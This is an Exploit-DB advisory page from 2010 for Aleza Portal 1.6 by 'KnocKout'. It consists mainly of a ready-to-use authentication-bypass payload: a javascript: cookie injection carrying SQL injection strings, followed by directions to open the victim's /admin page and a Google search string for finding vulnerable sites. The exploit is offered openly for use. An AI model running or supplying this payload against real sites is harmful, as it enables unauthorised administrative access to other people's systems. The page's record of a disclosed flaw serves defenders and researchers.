Aleza Portal 1.6 - Insecure SQL Injection / Cookie Handling

EDB-ID:

15144

CVE:

N/A


Author:

KnocKout

Type:

webapps


Platform:

Windows

Date:

2010-09-28


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling 
=========================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout 
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Aleza Portal v1.6
~Software: http://www.webavail.com/
-Demo : http://www.webavail.com/alezademo/
~Vulnerability Style : (SQLi) Cookie Handling
~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Explotation ~~~~~~~~~~~

    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
    ================================
          [+]  Exploitable Browser Injected!

          [+]   Go to : http://[Victim]/admin
          
      
      GoodLucK ;)